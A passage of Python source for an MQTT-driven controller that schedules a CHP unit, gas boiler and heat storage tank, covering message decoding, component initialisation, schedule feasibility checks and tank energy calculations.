#apiKey = 'QKAAbMxLbv5TfhFxjTv4lhw92m'
#sensor_name = 'urn:ngsi-ld:rvk:001'
#attributes = 'cmd' # HERE TO DO YET ASK STEPHAN what it was fiware tutorial mqtt
#topic = "#"
topic = "/{}/{}/{}".format(apiKey, sensor_name, attributes)
client.subscribe(topic) # subscribe
#client.loop_start()
if(self.dbg == 1):
print('subscribed to topic = {}'.format(topic))
# end subscribe_to_schedule
# ==================================================================
def decode_schedule_from_ul_msg(self, message):
if(self.dbg == 1):
print('ENTERed decode_schedule_from_ul_msg')
isvalid = False
content = False
msg = str(message.payload.decode("utf-8")).split("|") # list of strings
if(self.dbg == 2):
GG = open("{}/mysched.dat".format(self.dbg_path),"w")
GG.write(' schedule received from the platform \n')
GG.write(' {} '.format(msg))
GG.close()
sched = {}
isvalid = False
time_data = {'valid': False}
if(self.dbg == 1):
print('time_data VOR = {}'.format(time_data))
cmd_type = msg[1]
if(self.dbg == 1):
print('cmd_type = {}'.format(cmd_type))
if(cmd_type == 'schedule'):
result_array = []
times = msg[6::3] # all time stamps
flags = msg[7::3] # all validity flags
vals = msg[8::3] # all values of electricity production
if((len(times)==len(flags))and(len(times)==len(vals))and(len(flags)==len(vals))):
if(len(times)>0):
content = True
for ii in range(len(times)):
out_time = utils.extract_time_stamp_from_string(times[ii])
result_array.append({'time_stamp' : out_time, 'activation' : bool(flags[ii]) , 'energy_production_in_W' : float(vals[ii])})
if((msg[2]=='timestep_in_s') and (msg[4]=='active schedule')):
sched = {'timestep_in_s': float(msg[3]), 'active schedule': bool(msg[5]), 'values': result_array}
if(content):
isvalid = True
# end if(cmd_type == 'schedule'):
elif(cmd_type == 'time_sync'):
act_time = utils.extract_time_stamp_from_string(msg[7])
time_data = {'start_time_in_h': float(msg[3]), 'end_time_in_h': float(msg[5]), 'actual_time': act_time, 'valid': True}
# end elif(cmd_type == 'time_sync'):
else:
print('\n\n\n\n received invalid command from platform {}\n\n\n\n'.format(cmd_type))
#self.control_execute_schedule()
#return (isvalid, sched)
if(self.dbg == 1):
print('time_data NACH = {}'.format(time_data))
return (cmd_type, isvalid, sched, time_data)
# end decode_schedule_from_ul_msg
# ==================================================================
def on_message(self, client, userdata, message):
# receives the schedule for rvk - or the times for simulation
(cmd_type, isvalid, sched, time_data) = self.decode_schedule_from_ul_msg(message)
#(isvalid, sched) = self.decode_schedule_from_ul_msg(message, placex)
if(self.dbg == 2):
print(isvalid, sched)
if(cmd_type == 'schedule'): # received the schedule
if(isvalid):
self.current_schedule = sched
self.schedule_changed = True
else:
print('received an invalid schedule')
#end if(cmd_type == 'schedule'):
elif(cmd_type == 'time_sync'): # received the times for simulation in multi gateway mode without real time operation
self.time_data = time_data
# end on_message
# ==================================================================
def on_message2(self, client, userdata, message):
# receives heat production in the given time slot from the demonstrator
if(self.dbg == 1):
print('\n\nON MESSAGE 2 \n\n')
msg = str(message.payload.decode("utf-8")).split("|") # list of strings
if(self.dbg == 1):
print(msg,type(msg))
time_stamp = utils.extract_time_stamp_from_string(msg[0])
self.q_in_kW = float(msg[1])
self.got_demo_data = True
if(self.dbg == 1):
print('got {} from demo1 at time {}'.format(self.q_in_kW, time_stamp))
# end on_message2
# ==================================================================
def on_connect(self, client, userdata, flags, rc):
if(self.dbg == 1):
print('\n\nON CONNECT\n\n')
if rc == 0:
client.connected_flag = True
else:
print('Bad connection returned code {}'.format(rc))
client.loop_stop()
# ==================================================================
def on_disconnect(self, client, userdata, rc):
print('client has disconnected')
# ==================================================================
def on_publish(self, client, userdata, message):
if(self.dbg == 1):
print(".", end = '')
#print("ON PUBLISH {}".format(client))
#print("received message =", str(message.payload.decode("utf-8")))
# ==================================================================
def initialize_components(self, config_file):
conf_calc = config_file['calculation']
time_step_in_s = conf_calc['time_step_in_s'] # in seconds
record_step_in_s = conf_calc['record_step_in_s'] # in seconds
self.dbg_path = config_file['calculation']['simulation_mode']['dbg_path']
start_sim_inh = conf_calc['simulation_mode']['start_sim_in_hours'] # starting time of the simulation in h
end_sim_inh = conf_calc['simulation_mode']['end_sim_in_hours'] # end time of the simulation in h
wetter_file = utils.check_and_open_file(conf_calc['simulation_mode']['weather_file_path']) # list of strings
dhw_load_file = utils.check_and_open_file(conf_calc['simulation_mode']['dhw_profile_file_path']) # list of strings
#el_load_file = utils.check_and_open_file(conf_calc['simulation_mode']['el_load_file_path']) # list of strings
el_load_file = 0
real_time_send = conf_calc['platform_mode']['real_time_send']
sleep_time_in_s = conf_calc['platform_mode']['sleep_time_in_s']
sim_flag = conf_calc['mode']
if(sim_flag == 'simulation'):
simulation = True
platform = False
elif(sim_flag == 'platform'):
simulation = True
platform = True
elif(sim_flag == 'multigw'):
simulation = False
platform = True
else:
simulation = False
platform = False
actual_time = self.initialize_actual_time(real_time_send, start_sim_inh, end_sim_inh) # time in datetime format
F = open(conf_calc['simulation_mode']['output_file_path'],"w")
# mqtt
conf_plat = conf_calc['platform_mode']
self.mqtt_broker = conf_plat['mqtt_broker']
self.mqtt_port_nr = conf_plat['mqtt_port_nr']
self.mqtt_api_key = conf_plat['mqtt_api_key']
self.mqtt_sensor_name = conf_plat['mqtt_sensor_name']
self.mqtt_attributes = conf_plat['mqtt_attributes']
self.mqtt_client_name = conf_plat['mqtt_client_name_attr']
self.mqtt_commands = conf_plat['mqtt_commands']
#self.mqtt_client_name_cmd = conf_plat['mqtt_client_name_cmd']
conf_comp = config_file['components']
tsm = timestep.timestepmanager(time_step_in_s, conf_comp['timestep_manager']['minimal_timestep_in_s'], actual_time)
self.tsm = tsm
chp = self.initialize_chp_unit(conf_comp['chp_unit'], actual_time)
self.chp = chp
kessel = self.initialize_gas_boiler(conf_comp['gas_boiler'], actual_time)
self.boiler = kessel
tank = self.initialize_storage_tank(conf_comp['storage_tank'], actual_time, tsm, self.dbg_path)
self.storage_tank = tank
cvalve = controlvalve.ThreeWayControlValve(conf_comp['control_valve']['initial_hub_position_0_1'])
heizkurve = self.initialize_heating_curve(conf_comp['heating_curve'])
self.heizkurve = heizkurve
# prediction - global and output
self.prediction_time_step_in_s = config_file['prediction']['prediction_time_step_in_s']
self.next_prediction_timestamp = actual_time + timedelta(seconds=self.prediction_time_step_in_s)
self.output_horizon_in_h = config_file['prediction']['output_horizon_in_h']
self.output_resolution_in_s = config_file['prediction']['output_resolution_in_s']
# sending of monitoring data to the platform
self.send_intervall_in_s = config_file['calculation']['send_intervall_in_s']
self.send_intervall_in_s = max(self.send_intervall_in_s, time_step_in_s) # validity of the data
self.next_sending_timestamp = actual_time + timedelta(seconds=self.send_intervall_in_s)
# Martin's code
conf_pred = config_file['prediction']['heat']
pred_res_in_s = config_file['prediction']['power']['resolution_in_s']
powr_conf = config_file['prediction']['power']
pred = self.initialize_thermal_prediction(config_file)
predict_thermal.write_init(conf_pred['path_result'])
#if(platform):
#crdb_endpoint = config_file['calculation']['platform_mode']['crdb_endpoint']
#crdb_endpoint_add = config_file['calculation']['platform_mode']['crdb_endpoint_add']
#crdb_username = config_file['calculation']['platform_mode']['crdb_username']
#crdb_direct_com = config_file['calculation']['platform_mode']['crdb_direct_com']
#pred.initialize_crate_db_connection(crdb_endpoint, crdb_endpoint_add, crdb_username, crdb_direct_com)
# schedule
self.current_schedule = self.initialize_schedule(actual_time)
# demonstrator
demonstrator = conf_calc['demonstrator_mode']['activated']
# control
heatc_conf = config_file['components']['heating_curve']
# multi gateway mode
multiple_gateways = config_file['calculation']['platform_mode']['multiple_gateways']
provisioning_endpoint = config_file['calculation']['platform_mode']['provisioning_endpoint']
#device_id = config_file['calculation']['platform_mode']['mqtt_sensor_name']
device_id = self.mqtt_sensor_name
# authentication
authentication = config_file['calculation']['platform_mode']['authentication']['activate']
mqtt_username = config_file['calculation']['platform_mode']['authentication']['mqtt_username']
mqtt_password = config_file['calculation']['platform_mode']['authentication']['mqtt_password']
tls_connection = config_file['calculation']['platform_mode']['authentication']['tls_connection']
mqtt_topic_attr = "/{}/{}/{}".format(self.mqtt_api_key, device_id, self.mqtt_attributes)
self.dbg = config_file['calculation']['simulation_mode']['dbg_level']
return (platform, simulation, time_step_in_s, record_step_in_s, start_sim_inh, end_sim_inh, wetter_file, dhw_load_file, el_load_file,
actual_time, F, tsm, tank, chp, kessel, cvalve, heizkurve, pred, real_time_send, sleep_time_in_s, demonstrator, pred_res_in_s,
powr_conf, heatc_conf, multiple_gateways, provisioning_endpoint, device_id, authentication, mqtt_username, mqtt_password, tls_connection,
mqtt_topic_attr)
# end function initialize_components
# ==================================================================
def initialize_thermal_prediction(self, config_file):
""" copyright by Martin Knorr """
conf_pred = config_file['prediction']['heat']
conf_powr = config_file['prediction']['power']
# config_json
n_day = conf_pred['n_day']
n_values = conf_pred['n_values_per_day']
precision_in_h = conf_pred['precision_in_h']
use_predef_loads = conf_pred['use_predef_loads']
predef_loads_file_path = conf_pred['path_loads']
# heating curve
conf_hk = config_file['components']['heating_curve']
hk_ta = conf_hk['design_ambient_temperature_oC']
hk_ti = conf_hk['design_indoor_temperature_oC']
hk_tv = conf_hk['design_supply_temperature_oC']
hk_tr = conf_hk['design_return_temperature_oC']
hk_n = conf_hk['radiator_coefficient_n']
hk_m = conf_hk['radiator_coefficient_m']
hk_qn = conf_hk['design_heat_load_in_kW']
# chp unit
patm = utils.get_pressure_in_MPa()
calcopt = utils.get_calc_option()
eps_el_chp = config_file['components']['chp_unit']['electrical_efficiency']
eps_th_chp = config_file['components']['chp_unit']['thermal_efficiency']
qel_n_chp = config_file['components']['chp_unit']['max_electric_power_in_kW']
chp_tinp = config_file['components']['chp_unit']['design_input_temperature_oC']
chp_tmax = config_file['components']['chp_unit']['design_output_temperature_oC']
qth_n_chp = eps_th_chp * qel_n_chp / eps_el_chp # in kW
mstr_chp = qth_n_chp / (utils.cp_fluid_water(0.5 * (chp_tmax + chp_tinp), patm, calcopt) * (chp_tmax - chp_tinp)) # in kg/s = kW / (kJ/kg/K * K)
# gas boiler
qth_n_gb = config_file['components']['gas_boiler']['max_thermal_power_in_kW']
gb_tinp = config_file['components']['gas_boiler']['design_input_temperature_oC']
gb_tmax = config_file['components']['gas_boiler']['design_output_temperature_oC']
mstr_gb = qth_n_gb / (utils.cp_fluid_water(0.5 * (gb_tinp + gb_tmax), patm, calcopt) * (gb_tmax - gb_tinp)) # in kg/s = kW / (kJ/kg/K * K) # in kg/s = kW / (kJ/kg/K * K)
# storage tank
effective_height = config_file['components']['storage_tank']['effective_heigth_in_m']
inner_radius = config_file['components']['storage_tank']['inner_radius_tank_in_m']
effective_pipe_volume = config_file['components']['storage_tank']['effective_coil_volume_in_m3']
effective_volume = config_file['components']['storage_tank']['effective_volume_in_m3']
if (effective_volume <= 0.0):
effective_volume = math.pi * inner_radius * inner_radius * effective_height - effective_pipe_volume # in m3
nr_calc = 20
slice_volume = effective_volume / nr_calc # in m3
qmax_rod_el = config_file['components']['storage_tank']['power_heating_rod_in_kW']
open_weather_map_active = config_file['calculation']['platform_mode']['open_weather_map_active']
# conf_powr
#print('\n initialize_thermal_prediction')
#print('use_predef_loads = {}; {}'.format(use_predef_loads,type(use_predef_loads)))
#print('predef_loads_file_path = {}; {}'.format(predef_loads_file_path,type(predef_loads_file_path)))
return predict_thermal.predict_Q(n_day, n_values, precision_in_h, predef_loads_file_path, use_predef_loads, self.output_horizon_in_h,
self.output_resolution_in_s, conf_powr, hk_tv, hk_tr, hk_ti, hk_ta, hk_qn, hk_n, hk_m, chp_tmax, gb_tmax, slice_volume,
mstr_chp, mstr_gb, qmax_rod_el, eps_th_chp, eps_el_chp, open_weather_map_active)
#end initialize_thermal_prediction
# ==================================================================
def initialize_schedule(self, actual_time):
nn = int((self.output_horizon_in_h * 3600.0) // self.output_resolution_in_s)
if((self.dbg == 1) or (self.dbg == 2)):
print('\n\n initialize schedule. typ of n = {}; n = {}'.format(type(nn),nn))
result_array = []
for ii in range(nn):
newx = {'time_stamp' : actual_time + timedelta(seconds = self.output_resolution_in_s * ii), 'activation' : False , 'energy_production_in_W' : (np.random.random()*2000.0 - 1000.0)}
result_array.append(newx)
#print(newx)
schedule = {'timestep_in_s' : 900, 'active schedule' : False, 'values' : result_array}
#print('result_array = {}'.format(result_array))
#print('schedule = {}'.format(schedule))
return schedule
#end initialize_schedule
# ==================================================================
def initialize_heating_curve(self, config_json):
design_ambient_temperature_oC = config_json['design_ambient_temperature_oC']
design_indoor_temperature_oC = config_json['design_indoor_temperature_oC']
design_supply_temperature_oC = config_json['design_supply_temperature_oC']
design_return_temperature_oC = config_json['design_return_temperature_oC']
radiator_coefficient_n = config_json['radiator_coefficient_n']
radiator_coefficient_m = config_json['radiator_coefficient_m']
design_heat_load_in_kW = config_json['design_heat_load_in_kW']
self.tni = design_indoor_temperature_oC
self.coef = (design_indoor_temperature_oC - design_ambient_temperature_oC) / design_heat_load_in_kW
return heatingcurve.HeatingSystem(design_ambient_temperature_oC, design_indoor_temperature_oC, design_supply_temperature_oC,
design_return_temperature_oC, radiator_coefficient_n, radiator_coefficient_m, design_heat_load_in_kW)
#end initialize_heating_curve
# ==================================================================
def initialize_gas_boiler(self, config_json, actual_time):
thermal_efficiency = config_json['thermal_efficiency']
max_thermal_power_in_kW = config_json['max_thermal_power_in_kW']
initial_status_0_1 = config_json['initial_status_0_1']
min_resting_time_in_s = config_json['min_resting_time_in_s']
design_input_temperature_oC = config_json['design_input_temperature_oC']
design_output_temperature_oC = config_json['design_output_temperature_oC']
design_ambient_temperature_oC = config_json['design_ambient_temperature_oC']
return gasheater.GasBoiler(thermal_efficiency, max_thermal_power_in_kW, initial_status_0_1, min_resting_time_in_s,
design_input_temperature_oC, design_output_temperature_oC, design_ambient_temperature_oC, actual_time)
#end initialize_gas_boiler
# ==================================================================
def initialize_chp_unit(self, config_json, actual_time):
electrical_efficiency = config_json['electrical_efficiency']
thermal_efficiency = config_json['thermal_efficiency']
max_electric_power_in_kW = config_json['max_electric_power_in_kW']
initial_status_0_1 = config_json['initial_status_0_1']
min_resting_time_in_s = config_json['min_resting_time_in_s']
design_input_temperature_oC = config_json['design_input_temperature_oC']
design_output_temperature_oC = config_json['design_output_temperature_oC']
design_ambient_temperature_oC = config_json['design_ambient_temperature_oC']
return chpunit.ChpUnit(electrical_efficiency,thermal_efficiency,max_electric_power_in_kW,initial_status_0_1,
min_resting_time_in_s, design_input_temperature_oC, design_output_temperature_oC, design_ambient_temperature_oC, actual_time)
#end initialize_chp_unit
# ==================================================================
def initialize_storage_tank(self, config_json, actual_time, tsm, dbg_path):
effective_heigth_in_m = config_json['effective_heigth_in_m']
inner_radius_tank_in_m = config_json['inner_radius_tank_in_m']
effective_coil_surface_in_m2 = config_json['effective_coil_surface_in_m2']
effective_coil_volume_in_m3 = config_json['effective_coil_volume_in_m3']
initial_temperature_in_oC = config_json['initial_temperature_in_oC']
effective_volume = config_json['effective_volume_in_m3']
if(initial_temperature_in_oC<(-273.15)):
t_ini = self.t_initial
else:
t_ini = initial_temperature_in_oC
alpha_losses_in_W_m2K = config_json['alpha_losses_in_W_m2K']
power_heating_rod_in_kW = config_json['power_heating_rod_in_kW']
initial_status_heating_rod_0_1 = config_json['initial_status_heating_rod_0_1']
dbg_level = config_json['dbg_level']
return storagetank.HeatStorageTank(effective_heigth_in_m, inner_radius_tank_in_m, effective_volume,
effective_coil_surface_in_m2, effective_coil_volume_in_m3,
t_ini, alpha_losses_in_W_m2K, actual_time, power_heating_rod_in_kW,
initial_status_heating_rod_0_1, tsm, 'implizit', 1, dbg_level, dbg_path) #
#end initialize_storage_tank
# ==================================================================
def save_data_for_prediction(self, pred, act_time_in_h, ambient_temp):
# Martin's code
qHeat = self.V_2 * utils.rho_fluid_water(self.t24, self.p_atm, 1) * (self.t25 - self.t24)
qDHW = self.V_1 * utils.rho_fluid_water(self.t22, self.p_atm, 1) * (self.t21 - self.t22)
#pred.run_to_save_data(act_time_in_h+2, qHeat + qDHW, ambient_temp)
pred.run_to_save_data(act_time_in_h, qHeat + qDHW, ambient_temp)
# if (pred.get_q_write()):
# predict_thermal.write_q(t[index],t_e_1day,q_1day,t_e_2day,q_2day)
#end save_data_for_prediction
# ==================================================================
def free_sched(self):
# resets the saved data for schedule calculation
self.tau_end = 0 # datetime - end of the current time slot
self.tau_off = 0 # datetime - till this time the self.E_produced_in_kWh will supposedly reach schedule
self.e_produced_in_kWh = 0 # double - aggregated production in this time slot
self.e_to_prod_in_kWh = 0 # double - envisioned production in this time slot
self.production = [] # list of dicts - contains production data for the last timestep
#self.sched_idx = 0 # index in list of dicts
# end free_sched
# ==================================================================
def calc_energy_prod_in_old_step(self, actual_time):
# returns energy in kWh that has been produced for the time slot in the current schedule
# during the validity of the old schedule
# returned value should be mostly zero or close to it - as long as getting updated schedule does not take longer than a time step
# find the \tau_start,new in the saved production data and integrate it up to actual time
# tau_start _new
tau_start = self.current_schedule['values'][0]['time_stamp'] - timedelta(seconds=self.output_resolution_in_s)
Q_old_in_kWh = 0.0
if (len(self.production) > 0):
ii = 0
# find index of the tau_start_new in the saved production
while(self.production[ii]['time_stamp'] <= tau_start):
ii += 1
jj = ii
while(self.production[ii]['time_stamp'] <= actual_time):
ii += 1
#Q_chp_el = self.Wh1
#Q_rod_el = self.Wh2
#Q_cons_el = self.Wh3 - self.Wh2 - self.Wh1
#Q_old += Q_chp_el - Q_rod_el - Q_cons_el # = 2*Wh - Wh3 = Wh1 - Wh2 - Wh3 + Wh2 + Wh1
#Q_old += self.production[]
Q_old_in_kWh = Q_old_in_kWh + self.production[ii]['Q_in_kWh']
return Q_old_in_kWh
# end calc_energy_prod_in_old_step
# ==================================================================
def get_val_from_sched(self, sched, actual_time):
result_array = sched['values']
ii = 0
# find the position of actual_time in the current schedule
while(result_array[ii]['time_stamp'] <= actual_time):
ii += 1
# return the data
valid_time = result_array[ii]['time_stamp']
set_point_val = result_array[ii]['energy_production_in_W']
is_active = result_array[ii]['activation']
return (ii, valid_time, is_active, set_point_val)
# end get_val_from_sched
# ==================================================================
def check_validity_of_sched(self, actual_time):
# returns :
# - index of the scheduled timeslot in the current valid schedule
# - time stamp marking the end of the scheduled timeslot in datetime format
# - the flag declaring whether the scheduled value is valid (True)
# - the value of average electrical power to be produced within the scheduled time slot in W
# if flag is True, the returned value might differ from zero W
# is the whole schedule active?
c1 = self.current_schedule['active schedule']
# is the current schedule not outdated, i.e. is the last time stamp of schedule still biggeer than the actual time?
values = self.current_schedule['values']
c2 = (actual_time <= values[-1]['time_stamp'])
if(c1 and c2):
# time stamps in the schedule have to be ordered and monotonously growing
ii = 0
while (values[ii]['time_stamp'] < actual_time):
ii = ii + 1
# values to be returned
valid_time = values[ii]['time_stamp']
is_active = values[ii]['activation']
value_in_W = values[ii]['energy_production_in_W']
else:
# either whole schedule is invalid or it is outdated
ii = 0
valid_time = actual_time - timedelta(seconds=10)
is_active = False
value_in_W = 0.0
return (ii, valid_time, is_active, value_in_W)
# end check_validity_of_sched
# ==================================================================
def check_feasibility_of_sched(self, actual_time):
# returns True when the production/consumption can be attained
# otherwise returns False
prec_kWh = 0.0 # precision for the conditions, 0 means no errors are allowed
is_valid = True # result, first assumption
q_netto_el_kWh = self.e_to_prod_in_kWh - self.e_produced_in_kWh # amount of energy left to produce
t_netto_s = (self.tau_end - actual_time).seconds # time left for production process
# The installed electric power: for production and usage
q_el_prod_kWh = self.chp.get_design_electric_output() * t_netto_s / 3600.0 # kWh = kW * s *h/3600s
q_el_use_kWh = self.storage_tank.get_max_thermal_rod_power() * t_netto_s / 3600.0 # kWh = kW * s *h/3600s
# installed power:
# is the installed electric power enough to cover the demand?
# case 1: energy should be produced - is there enough time for the system to provide it based on the installed power?
if((q_netto_el_kWh > 0.0) and (q_netto_el_kWh > q_el_prod_kWh + prec_kWh)):
is_valid = False # more energy should be PRODUCED than the installed power allows
# case 2: energy should be consumed - is there enough time for the system to take it up based on the installed power?
if((q_netto_el_kWh < 0.0) and (abs(q_netto_el_kWh) > q_el_use_kWh + prec_kWh)):
is_valid = False # more energy should be CONSUMED than the installed power allows
# Sperrzeiten:
# case 1: energy should be produced - is there enough time to produce it when the Sperrzeiten are taken into account?
# can the installed power be used due to the minimal inactivation times
if((q_netto_el_kWh > 0.0) and (not self.chp.get_status()) and (self.chp.get_next_safe_turn_on_time() > actual_time)):
# produce el AND chp is off AND chp cannot be yet turned on
t_left_s = (self.tau_end - self.chp.get_next_safe_turn_on_time()).seconds
# check if there is any time left at all
if(t_left_s < 0):
is_valid = False # there will be NO TIME LEFT to produce the required energy - due to minimal rest time of CHP unit
# check if the time is enough to cover the demand with the installed power of CHP
# expected production from the installed power of CHP:
q_left_kWh = self.chp.get_design_electric_output() * t_left_s / 3600.0 # kWh = kW * s * h/s
if(q_netto_el_kWh > q_left_kWh + prec_kWh):
is_valid = False # there will be NO TIME LEFT to produce the required energy - due to minimal rest time of CHP unit AND due to installed power
# can the installed power be used due to the inactivation times defined by the network operator
(is_relevant, ts, te, delta) = self.time_interval_intersects_sperrzeiten(actual_time, self.tau_end)
q_left_kWh = self.chp.get_design_electric_output() * delta.seconds / 3600.0 # kWh = kW * s * h/s
if ((is_relevant) and (q_netto_el_kWh > q_left_kWh + prec_kWh)): #
print('X : throw exception: the schedule is not feasible due to Sperrzeiten')
is_valid = False
# determine heat produced due to the electricity production/consumption that has to be stored in the storage tank in kWh
if(q_netto_el_kWh > 0.0):
Q_th_kWh = self.chp.get_el_prod_kWh(q_netto_el_kWh) # heat is produced by the CHP unit
elif(q_netto_el_kWh < 0.0):
Q_th_kWh = self.chp.get_design_electric_output() * t_netto_s / 3600.0 # heat is produced by the heating rod placed in the storage tank
# how much heat can be stored in the storage tank?
last_t_profile = self.storage_tank.output_temperatures() # get temperature proil in the staorage tank
tmax = self.chp.get_max_temp_of_chp() # get maximal temperature that is to be expected from CHP unit
Q_pot_in_kWh = self.thermal_energy_that_can_be_put_in_storage(tmax, last_t_profile) # how much energy can be stored in (put into) storage tank
# can the heat produced due to electricity production/consumption be accomodated in the storage tank?
if(Q_th_kWh > Q_pot_in_kWh):
is_valid = False # storage tank cannot take up enough heat
return is_valid
# end check_feasibility_of_sched
# ==================================================================
def thermal_energy_that_can_be_put_in_storage(self, tmax, temp_profil):
# returns thermal energy in kWh that can be still put into storage tank
# tmax - maximal temperature of the storage tank in °C
# return self.rvk.get_energy_left_to_tmax(tmax)
# copied from storage_tank.calc_energy_left_to_tmax(self, tmax):
# only values below tmax are integrated
p_in_MPa = utils.get_pressure_in_MPa()
calc_option = utils.get_calc_option()
cpmax = utils.cp_fluid_water(tmax, p_in_MPa, calc_option)
wyn = 0.0
# Q in kWh = Dt * cp * V_i * rho_i [ K * J/kg/K * m3 * kg/m3 * h/3600s * 1kW/1000W = kWh]
for tx in temp_profil:
cpx = utils.cp_fluid_water(tx, p_in_MPa, calc_option)
rox = utils.rho_fluid_water(tx, p_in_MPa, calc_option)
if(tmax >= tx):
wyn = wyn + (tmax * cpmax - tx * cpx) * self.slice_volume * rox / (3600.0 * 1000.0)
return wyn
# end thermal_energy_that_can_be_put_in_storage
# ==================================================================
def thermal_energy_that_can_be_got_from_storage(self, tmin, temp_profil):
# returns thermal energy in kWh that can be still put into storage tank
# tmax - maximal temperature of the storage tank in °C
# copied from storage_tank.calc_energy_above_tmin
# only values above tmin are integrated
p_in_MPa = utils.get_pressure_in_MPa()
calc_option = utils.get_calc_option()
cpmin = utils.cp_fluid_water(tmin, p_in_MPa, calc_option)
wyn = 0.0
# Q in kWh = Dt * cp * V_i * rho_i [ K * J/kg/K * m3 * kg/m3 * h/3600s * 1kW/1000W = kWh]
for tx in temp_profil:
cpx = utils.cp_fluid_water(tx, p_in_MPa, calc_option)
rox = utils.rho_fluid_water(tx, p_in_MPa, calc_option)
if(tx >= tmin):
wyn = wyn + (tx * cpx - tmin * cpmin) * self.slice_volume * rox / (3600.0 * 1000.0)
return wyn
# end thermal_energy_that_can_be_got_from_storage
# ==================================================================
def time_interval_intersects_sperrzeiten(self, t_start, t_end):
# default results
delta = t_end - t_start
wyn = (False, t_start, t_end, delta)
ts = t_start.time() # ts is t_start in time format
te = t_end.time() # te is t_end in time format
# is the Sperrzeiten are consistently defined
if(self.sp_active):
if(len(self.sp_start) == len(self.sp_end)):
# check all Sperrzeiten for intersection
for ii in range(self.sp_start):
tsi = utils.extract_hms_time_from_string(self.sp_start[ii]) # tsi is sp_start in time format
tei = utils.extract_hms_time_from_string(self.sp_end[ii]) # tse is sp_end in time format
if(not(((ts < tsi) and (te <= tsi)) or ((ts >= tei) and (te > tei)))): # interval's borders are not outside of the Sperrzeit
if((ts >= tsi) and (ts < tei) and (te > tsi) and (te <= tei)): # both start and end time false ==> within the Sperrzeit
te = ts # no usable time in the interval - times become irrelevant
delta = te - ts
elif((ts >= tsi) and (ts < tei)): # start time false ==> within the Sperrzeit
ts = tei
delta = te - ts
elif((te > tsi) and (te <= tei)): # end time false ==> within the Sperrzeit
te = tsi
delta = te - ts
else: # both times correct, Sperrzeit lies within the time interval- choose first possible intervall
#delta = (te - ts) - (tei - tsi)
delta = te - tei + tsi - ts
te = tsi # ts remains unchanged
tswyn = t_start.replace(hour=ts.hour, minute=ts.minute, second = ts.second, microsecond=ts.microsecond)
tewyn = t_end.replace(hour=te.hour, minute=te.minute, second = te.second, microsecond=te.microsecond)
wyn = (True, tswyn, tewyn, delta)
# end if(len(self.sp_start) == len(self.sp_end)):
else:
print('throw exception - Sperrzeiten sind falsch definiert')
# end if(len(self.sp_start) == len(self.sp_end)): else:
# end if(self.sp_active):
# returns flag and first possible time interval in datetime format
# end time_interval_intersects_sperrzeiten
return wyn
# ==================================================================
def get_electricity_consumption_of_timestep_kWh(self, time_step_in_s, pred_res_in_s):
# self.electricity_consumption_kWh - predicted electricity consumption within the time slot pred_res_in_s
# time_step_in_s - length of the time step in seconds
# pred_res_in_s - length of the time slot of prediction in seconds
# return electricity consumption within the time step in kWh
# kW = kWh * s/h / s
return self.electricity_consumption_kWh * time_step_in_s / pred_res_in_s
# end get_electricity_consumption_of_timestep_kWh
# ==================================================================
def calc_el_cons_other(self, actual_time, powr_conf):
type_of_prediction = powr_conf['type_of_prediction']
if(type_of_prediction == 'SLP'):
el_data = powr_conf['SLP']
pred_res_in_s = powr_conf['resolution_in_s']
data_set = utils.get_slp_data_set(actual_time, el_data, pred_res_in_s)
# first element of the data_set is relevant for actual_time
# returns value in kWh that represents the whole time slot of length pred_res_in_s
# kWh = kW * s * h/3600s
return data_set[0] * pred_res_in_s / 3600.0
# end calc_el_cons_other
# ==================================================================
def control_execute_schedule(self, actual_time):
# this procedure updates the current schedule when new data is received from the platform
# it also sets the flags for the control mode (self.keep_chp_on and self.keep_chp_off) for an active schedule
# the control algorithm that executes the schedule is to be found in procedure self.control_internal_1
# This algorithm uses the flags set here to control all apliances
sched = self.current_schedule # get abbreviated name for better readability
# check the change of schedule
if(self.schedule_changed):
Q_old_in_kWh = self.calc_energy_prod_in_old_step(actual_time)
self.free_sched() # reset the schedule's history
self.e_produced_in_kWh = Q_old_in_kWh
self.schedule_changed = False
self.tau_end = self.current_schedule['values'][0]['time_stamp']
if(self.dbg == 2):
print('end_tau = {}'.format(self.tau_end))
# check the validity of the schedule in the given time step == actual_time
(sch_idx, self.tau_end, is_active, value_in_W) = self.check_validity_of_sched(actual_time)
# if schedule is active, set control flags for its execution
if(is_active):
# energy that is to be produced
self.e_to_prod_in_kWh = value_in_W * self.output_resolution_in_s / 3600000.0 # in kWh = W * s * h/3600s * kW/1000W
# check the feasibility of the schedule - is there enough time left to produce the requred energy
is_feasible = self.check_feasibility_of_sched(actual_time)
if(not is_feasible):
# send message to platform, that problems with schedule execution might arise
print('schedule value is infeasible')
# execute the schedule
if((self.e_to_prod_in_kWh<0.0) and(self.e_to_prod_in_kWh<self.e_produced_in_kWh)):
# activate the consumer of electricity
#self.rod_stat = self.storage_tank.get_max_thermal_rod_power() * self.tsm.get_timestep()
self.chp.turn_off() # turn on CHP if it is off
self.rod_stat = 1.0 # power usage form 0 to 1; 0 is no power, 1 is full power.
self.keep_chp_on = False
self.keep_chp_off = True
if((self.e_to_prod_in_kWh>0.0) and (self.e_to_prod_in_kWh>self.e_produced_in_kWh)):
self.chp.turn_on() # turn on CHP if it is off
self.rod_stat = 0.0 # power usage form 0 to 1; 0 is no power, 1 is full power.
self.keep_chp_on = True
self.keep_chp_off = False
else:
self.rod_stat = 0.0
#end control_execute_schedule
# ==================================================================
def update_electricity_production_status(self, time_step_in_s, pred_res_in_s):
# update the production
# electricity consumption of the building (= others) in kWh in this time step
Q_cons_el_kWh = self.get_electricity_consumption_of_timestep_kWh(time_step_in_s, pred_res_in_s)
# electricity production by the CHP unit in kWh in this time step
Q_chp_el = self.chp.get_el_prod() * time_step_in_s / 3600.0 # kWh = kW * s * h/3600s
# electricity consumption by the heating rod in the storage tank in kWh in this time step
Q_rod_el = self.rod_stat * self.get_max_thermal_rod_power() * time_step_in_s / 3600.0 # kWh = kW * s * h/3600s
# balance of the produced and used electrical energy in kWh
delta_q_kWh = Q_chp_el - Q_rod_el - Q_cons_el_kWh
#
self.e_produced_in_kWh = self.e_produced_in_kWh + delta_q_kWh
self.e_to_prod_in_kWh = self.e_to_prod_in_kWh - delta_q_kWh
# edn update_electricity_production_status
# ==================================================================
def condition_heating_1(self, t_a, t23, t25):
# turn on all sources because sotrage tank has too low temperature to provide heat
wyn = False
if(t_a <= 15.0): # heating period
if(t23 < t25): # tank water too cold to heat the building
wyn = True
return wyn
# end condition_heating_1
# ==================================================================
def condition_heating_2(self, t2, t3, t21):
# turn off all sources - because stoarge tank is loaded up
wyn = False
if((self.t2 > 45.0) or (self.t3 > 60.0)): # storage tank is filled up with hot water
if(t21 > 45.0): # DHW is warm enough
